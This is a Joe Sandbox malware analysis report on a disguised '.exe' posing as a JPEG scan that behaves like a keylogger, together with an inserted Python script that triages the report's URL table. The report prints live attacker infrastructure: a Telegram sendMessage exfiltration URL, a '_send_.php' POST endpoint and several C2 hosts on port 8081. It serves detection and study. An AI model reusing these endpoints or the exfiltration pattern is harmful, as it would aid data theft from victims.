                                                                            http://www.fontbureau.com/designers8Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20aScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F88000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DE4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F5D000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E2E000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000004081000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003DFD000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E28000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003F20000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://kafs.co.ugdScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                  unknown
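The rows of the URL table above carry more than a list of strings: each Source entry names the process and memory region the string was recovered from, and that lets the C2 endpoints the payload embeds be separated from the font, licence and Office help URLs that every .NET process drags into its heap. The script below is an added example, not part of the Joe Sandbox report and not a Joe Sandbox tool. It parses four rows copied from the table (still in the fused URL/Source/Malicious form the page shows), splits the Source column into per-process memory dumps, dropped files and on-disk files, and flags URLs that occur in an executable region. Two fields of the dump name are interpreted, and both readings are assumptions about Joe Sandbox's naming rather than facts the report states: the first dotted field is treated as the analysis-internal process number (hex) and the fifth as the region's page protection, where the two values seen in the report, 0x04 and 0x40, equal the Windows PAGE_READWRITE and PAGE_EXECUTE_READWRITE constants. It also decodes the text= template of the captured Telegram sendMessage URL; the bot token and chat_id are empty in that string exactly as on the page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample input: four rows copied from the report's URL table, left
# in the fused form the page shows (URL, then the Source column, then the
# Malicious flag glued onto the last source).
SAMPLE_ROWS = [
    "http://www.fontbureau.comScan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, "
    "00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmpfalse",
    "http://varders.kozow.com:8081Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, "
    "00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, "
    "Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, "
    "00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, "
    "HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, "
    "HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, "
    "HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpfalse",
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20a"
    "Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, "
    "00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, "
    "HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmpfalse",
    "https://www.chiark.greenend.org.uk/~sgtatham/putty/0Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, "
    "HJnkiZjAPsec.exe.0.drfalse",
]

# Process names that occur in the Source column of this report.
PROCESS_NAMES = ("Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe", "HJnkiZjAPsec.exe")

# A fused row: everything before the first process name is the URL, the final
# "true"/"false" is the Malicious flag, everything in between is the Source column.
ROW_RE = re.compile(
    r"^(?P<url>.*?)(?P<sources>(?:%s).*?)(?P<malicious>true|false)$"
    % "|".join(re.escape(n) for n in PROCESS_NAMES)
)

# Memory dump name as it appears in the Source column. ASSUMPTION about Joe
# Sandbox's naming: first field = analysis-internal process number (hex),
# fifth field = page protection of the dumped region. The other fields are
# matched but left uninterpreted.
DUMP_RE = re.compile(
    r"^(?P<proc>[0-9A-F]{8})\.[0-9A-F]{8}\.\d+\.(?P<base>[0-9A-F]{16})"
    r"\.(?P<protect>[0-9A-F]{8})(?:\.[0-9A-F]{8}){3}\.sdmp$"
)
PAGE_EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80  # Windows PAGE_EXECUTE* protection bits


def parse_row(row):
    """Split one fused row into URL, a structured Source list and the Malicious flag."""
    m = ROW_RE.match(row)
    if not m:
        raise ValueError("not a URL-table row: %r" % row[:60])
    tokens = m.group("sources").split(", ")
    sources, process = [], None
    for i, token in enumerate(tokens):
        d = DUMP_RE.match(token)
        if d:
            sources.append({"kind": "memory", "process": process,
                            "proc_no": int(d.group("proc"), 16),
                            "base": int(d.group("base"), 16),
                            "protect": int(d.group("protect"), 16)})
        elif token.endswith(".dr"):
            sources.append({"kind": "dropped_file", "name": token})
        elif i + 1 < len(tokens) and DUMP_RE.match(tokens[i + 1]):
            process = token  # a process name labels the dump that follows it
        else:
            sources.append({"kind": "file", "name": token})  # binary on disk
    return {"url": m.group("url"), "sources": sources,
            "malicious": m.group("malicious") == "true"}


def executable_region_urls(rows):
    """Map each URL found in an executable memory region to the regions holding it.

    Strings inside an RWX region of the unpacked payload are strings the payload
    carries itself; strings seen only in read-write heap pages of the .NET host
    (font and licence URLs from loaded assemblies) are background noise.
    """
    hits = {}
    for row in map(parse_row, rows):
        regions = ["%s#%d@0x%X" % (s["process"], s["proc_no"], s["base"])
                   for s in row["sources"]
                   if s["kind"] == "memory" and s["protect"] & PAGE_EXECUTE_MASK]
        if regions:
            hits[row["url"]] = regions
    return hits


def telegram_message_preview(url):
    """Return the decoded text= parameter of a Telegram sendMessage URL, else None."""
    parts = urlsplit(url)
    if parts.netloc != "api.telegram.org" or not parts.path.endswith("/sendMessage"):
        return None
    return parse_qs(parts.query, keep_blank_values=True).get("text", [""])[0]


if __name__ == "__main__":
    for url, regions in executable_region_urls(SAMPLE_ROWS).items():
        print("payload-embedded:", url, regions)
    for row in SAMPLE_ROWS:
        text = telegram_message_preview(parse_row(row)["url"])
        if text is not None:
            print("telegram message template:", repr(text))
```

On the four sample rows only varders.kozow.com:8081 survives the executable-region filter, through the 0x432000 region of process 0xB (HJnkiZjAPsec.exe) whose dump name carries protection 0x40. Reading the full table, the same dump appears in the Source of exactly six rows: varders.kozow.com:8081, aborters.duckdns.org:8081, anotherarmy.dns.army:8081, 51.38.247.67:8081/_send_.php, checkip.dyndns.org/q and reallyfreegeoip.org/xml/, which is the hard-coded C2 and IP-lookup set of the injected payload. The caveat is the other direction: the Telegram sendMessage URL and mail.kafs.co.ug occur only in read-write heap pages, so they are built at runtime from configuration and would be missed by a filter that trusts executable regions alone; the IP table below, which marks api.telegram.org and kafs.co.ug as malicious, is the check that catches them.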
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
104.243.33.38 | kafs.co.ug | United States | 23470 | RELIABLESITEUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1541880
Start date and time: 2024-10-25 09:17:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@16/11@4/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 261
• Number of non-executed functions: 18
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                  • VT rate limit hit for: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Time | Type | Description
03:17:59 | API Interceptor | 8337836x Sleep call for process: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe modified
03:18:01 | API Interceptor | 17x Sleep call for process: powershell.exe modified
03:18:05 | API Interceptor | 6072911x Sleep call for process: HJnkiZjAPsec.exe modified
08:18:03 | Task Scheduler | Run new task: HJnkiZjAPsec path: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  149.154.167.220Quote1.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                    g1TLK7mbZD.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        kQyd2z80gD.exeGet hashmaliciousDCRatBrowse
                                                                                          REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                      188.114.97.3https://is.gd/6NgVrQGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • aa.opencompanies.co.uk/vEXJm/
                                                                                                      Comprobante de pago.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                      • paste.ee/d/KXy1F
                                                                                                      01YP9Lwum8.exeGet hashmaliciousDCRatBrowse
                                                                                                      • 77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn.php
                                                                                                      PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.freedietbuilder.online/nnla/
                                                                                                      http://onlinecheapflights.net/Get hashmaliciousUnknownBrowse
                                                                                                      • onlinecheapflights.net/
                                                                                                      Technical Datasheet and Specification_PDF.exeGet hashmaliciousUnknownBrowse
                                                                                                      • www.rihanaroly.sbs/othk/?0dk=RykyQ3QZ+r1dqZwhAQupYMuQy26h2PYi8Fyfl3RAfHSVFgYOfXbCDUNV+aNHe22U393WzLygMMdANTa+vksg1hx1LENxGTGsZa2bATkiGgfiS6KvHA==&urk=NXuT
                                                                                                      request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                      • www.ergeneescortg.xyz/guou/
                                                                                                      Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.thetahostthe.top/9r5x/
                                                                                                      http://comodozeropoint.com/updates/1736162964/N1/Team.exeGet hashmaliciousUnknownBrowse
                                                                                                      • comodozeropoint.com/updates/1736162964/N1/Team.exe
                                                                                                      SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exeGet hashmaliciousUnknownBrowse
                                                                                                      • servicetelemetryserver.shop/api/index.php
                                                                                                      193.122.130.0REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      rp8s2rxD5lpuQAG.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      Pedido urgente_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      greatthingswithgreatideasgivenmerestthignstgood.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      NEW ORDER QUOTATION REQUEST.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      reallyfreegeoip.orgQuote1.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 188.114.96.3
                                                                                                      22390016593_20210618_14375054_HesapOzeti.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 188.114.96.3
                                                                                                      g1TLK7mbZD.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 104.21.67.152
                                                                                                      EKSTRE_1022.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 188.114.96.3
                                                                                                      Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 188.114.97.3
                                                                                                      Halkbank_Ekstre_20241022_081224_563756.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 188.114.96.3
                                                                                                      REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      SIPARIS-290124.PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      Renommxterne.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 188.114.96.3
                                                                                                      PAYMENT ADVISE MT107647545.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      checkip.dyndns.comQuote1.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 132.226.8.169
                                                                                                      22390016593_20210618_14375054_HesapOzeti.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 132.226.247.73
                                                                                                      g1TLK7mbZD.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 158.101.44.242
                                                                                                      EKSTRE_1022.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 193.122.6.168
                                                                                                      Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 193.122.6.168
                                                                                                      Halkbank_Ekstre_20241022_081224_563756.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 132.226.247.73
                                                                                                      REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 193.122.130.0
                                                                                                      SIPARIS-290124.PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                      • 132.226.8.169
                                                                                                      Renommxterne.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 158.101.44.242
                                                                                                      PAYMENT ADVISE MT107647545.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 193.122.6.168
                                                                                                      api.telegram.orgQuote1.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      g1TLK7mbZD.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      kQyd2z80gD.exeGet hashmaliciousDCRatBrowse
                                                                                                      • 149.154.167.220
                                                                                                      REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 149.154.167.220
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      TELEGRAMRUQuote1.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      g1TLK7mbZD.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      kQyd2z80gD.exeGet hashmaliciousDCRatBrowse
                                                                                                      • 149.154.167.220
                                                                                                      REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 149.154.167.220
                                                                                                      CLOUDFLARENETUSScan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      https://t.ly/BavariaFilmGmbH2410Get hashmaliciousUnknownBrowse
                                                                                                      • 188.114.96.3
                                                                                                      Quote1.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 188.114.96.3
                                                                                                      runtime.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 162.159.138.232
                                                                                                      runtime.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 162.159.128.233
                                                                                                      lUAc7lqa56.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.0.5
                                                                                                      https://temp.farenheit.net/XL1VkZE1FVGZjL0VwUUt5cWc4dkk1SWpqVFFTMUtQZ0krRFhobktOS05RSWpVMTZIYzk3b3hOUTBoZ2VYdnAzM21wZnYwMVBmdGN0MW12M09qVmMzbnNVeVpkeXBxeHVGd2V4eDRvVlZ5dERsakpjbGV3ZVZxRVhlZ0F6Q3hwQlptYUUyRFhHRzY3YkRXQ3hjWmhBZDBpMkNpakJDSnhzUG9xa2k2ZkdacVpDZVhFVFppeUJLcHJIaC0teVVJeERBTFd0K3k3b01rYS0tRk9zSWNIVEd0blVHZVlhTlFnVUxldz09?cid=2242420613Get hashmaliciousUnknownBrowse
                                                                                                      • 104.18.90.62
                                                                                                      la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 104.18.91.123
                                                                                                      la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 104.22.149.180
                                                                                                      Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                      • 188.114.97.3
                                                                                                      RELIABLESITEUShttp://holidaybunch.comGet hashmaliciousUnknownBrowse
                                                                                                      • 104.194.8.184
                                                                                                      SecuriteInfo.com.BScope.Trojan.Agentb.20481.11202.msiGet hashmaliciousUnknownBrowse
                                                                                                      • 103.195.103.66
                                                                                                      Priority_Quote_Request_Items_List.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 185.150.191.117
                                                                                                      ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 154.16.151.108
                                                                                                      20240930_185453_p1uYhraXAa8FqoQDzs1lqwv0Fp3NVQrL.emlGet hashmaliciousGRQ ScamBrowse
                                                                                                      • 104.238.220.6
                                                                                                      https://pub-c5538851da6244d790b9ba2a84c8b2af.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 104.194.8.184
                                                                                                      na.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 45.126.216.243
                                                                                                      x86.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 154.16.151.105
                                                                                                      https://oaemk-f29f.hmnaitswiaa.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                      • 104.194.8.184
                                                                                                      http://sanjaygowda23.github.io/netflix-homepageGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 104.194.8.184
ORACLE-BMC-31898US | la.bot.m68k.elf | Get hash | malicious | Unknown | Browse | 140.238.246.224
 | la.bot.sparc.elf | Get hash | malicious | Unknown | Browse | 130.35.12.1
 | la.bot.sh4.elf | Get hash | malicious | Unknown | Browse | 168.138.244.186
 | la.bot.arm7.elf | Get hash | malicious | Unknown | Browse | 130.61.64.122
 | la.bot.sh4.elf | Get hash | malicious | Unknown | Browse | 140.238.158.19
 | g1TLK7mbZD.img | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 158.101.44.242
 | EKSTRE_1022.exe | Get hash | malicious | MassLogger RAT | Browse | 193.122.6.168
 | Purchase Order.exe | Get hash | malicious | MassLogger RAT | Browse | 193.122.6.168
 | REVISED INVOICE.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 193.122.130.0
 | botnet.spc.elf | Get hash | malicious | Mirai, Moobot | Browse | 140.238.98.34
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
54328bd36c14bd82ddaa0c04b25ed9ad | Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.97.3
 | Quote1.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 188.114.97.3
 | 22390016593_20210618_14375054_HesapOzeti.pdf.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.97.3
 | g1TLK7mbZD.img | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.97.3
 | EKSTRE_1022.exe | Get hash | malicious | MassLogger RAT | Browse | 188.114.97.3
 | Purchase Order.exe | Get hash | malicious | MassLogger RAT | Browse | 188.114.97.3
 | Halkbank_Ekstre_20241022_081224_563756.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 188.114.97.3
 | SIPARIS-290124.PDF.exe | Get hash | malicious | PureLog Stealer, Snake Keylogger | Browse | 188.114.97.3
 | Renommxterne.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 188.114.97.3
 | PAYMENT ADVISE MT107647545.exe | Get hash | malicious | Snake Keylogger | Browse | 188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e | Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | copia de pago____xls.exe | Get hash | malicious | DarkCloud | Browse | 149.154.167.220
 | Quote1.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 149.154.167.220
 | runtime.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | runtime.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | https://temp.farenheit.net/XL1VkZE1FVGZjL0VwUUt5cWc4dkk1SWpqVFFTMUtQZ0krRFhobktOS05RSWpVMTZIYzk3b3hOUTBoZ2VYdnAzM21wZnYwMVBmdGN0MW12M09qVmMzbnNVeVpkeXBxeHVGd2V4eDRvVlZ5dERsakpjbGV3ZVZxRVhlZ0F6Q3hwQlptYUUyRFhHRzY3YkRXQ3hjWmhBZDBpMkNpakJDSnhzUG9xa2k2ZkdacVpDZVhFVFppeUJLcHJIaC0teVVJeERBTFd0K3k3b01rYS0tRk9zSWNIVEd0blVHZVlhTlFnVUxldz09?cid=2242420613 | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | nicegirlwithnewthingswhichevennobodknowthatkissingme.hta | Get hash | malicious | Cobalt Strike | Browse | 149.154.167.220
 | #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs | Get hash | malicious | FormBook, GuLoader | Browse | 149.154.167.220
 | EXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletOpsistype.vbs | Get hash | malicious | Remcos, GuLoader | Browse | 149.154.167.220
 | QYP0tD7z0c.exe | Get hash | malicious | DCRat | Browse | 149.154.167.220
                                                                                                      No context
                                                                                                      Process:C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1415
                                                                                                      Entropy (8bit):5.352427679901606
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                                                                                      MD5:3978978DE913FD1C068312697D6E5917
                                                                                                      SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                                                                                      SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
